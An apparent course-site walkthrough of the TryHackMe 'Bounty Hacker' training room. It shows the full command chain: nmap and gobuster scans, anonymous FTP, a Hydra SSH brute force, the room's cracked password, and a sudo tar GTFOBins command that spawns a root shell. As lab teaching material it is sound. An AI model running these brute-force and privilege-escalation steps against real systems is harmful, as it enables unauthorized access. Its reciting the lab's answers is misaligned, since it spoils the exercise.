Papadope Course
EN | ΕΛ

Bounty Hacker - TryHackMe Walkthrough

Bounty Hacker - TryHackMe Walkthrough

A beginner-friendly boot2root machine focused on FTP enumeration, SSH brute forcing, and privilege escalation via a misconfigured sudo permission for tar.

Room URL: https://tryhackme.com/room/cowboyhacker

Difficulty: Easy

Tools & Techniques Used

  • Nmap
  • Gobuster
  • FTP (anonymous login)
  • Hydra (SSH brute force)
  • SSH
  • GTFOBins (sudo tar privesc)

Step-by-Step Walkthrough

1. Enumeration

Run an initial scan to identify open services:

nmap -sC -sV -oN nmap.txt <TARGET_IP>

Typical findings:

Port Service Notes
21 FTP Anonymous login allowed
22 SSH OpenSSH
80 HTTP Apache web server

2. Web & FTP Enumeration

Web Directory Brute Force

Try Gobuster on HTTP:

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

In this room, web enumeration typically leads to dead ends.

FTP Anonymous Access

Connect to FTP anonymously:

ftp <TARGET_IP>
# Username: anonymous
# Password: (leave blank or enter anything)

Download all available files:

mget *

You should retrieve at least two files:

  • tasks.txt or similar — contains a task list with an author name (commonly lin)
  • locks.txt or similar — contains a list of potential passwords

3. Identify Username and Password List

From the task file, note the author’s name (commonly lin).

From the password file, save the list for brute forcing.

4. SSH Brute Force

Use Hydra to brute-force SSH with the discovered username and password list:

hydra -l lin -P locks.txt ssh://<TARGET_IP>

Result: You should obtain a valid password (commonly RedDr4gonSynd1cat3).

5. SSH Login and User Flag

Log in via SSH:

ssh lin@<TARGET_IP>
# Password: <CRACKED_PASSWORD>

Find the user flag, typically on the Desktop:

ls ~/Desktop
cat ~/Desktop/user.txt

6. Privilege Escalation

Check sudo permissions:

sudo -l

You’ll likely see that lin can run /bin/tar as root without a password.

Exploit Sudo Tar

Use GTFOBins technique to spawn a root shell via tar:

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

You should now have a root shell.

Collect the root flag, typically in /root/root.txt:

cat /root/root.txt

Notes

  • Redact any real passwords/flags if publishing publicly.
  • Key takeaways:
    • FTP anonymous access can leak usernames and password lists
    • Brute forcing SSH is a common path once you have a username and wordlist
    • Sudo misconfigurations (e.g., tar) are a classic privilege escalation vector
Previous Basic Pentesting - TryHackMe Walkthrough Next OhSINT - TryHackMe Walkthrough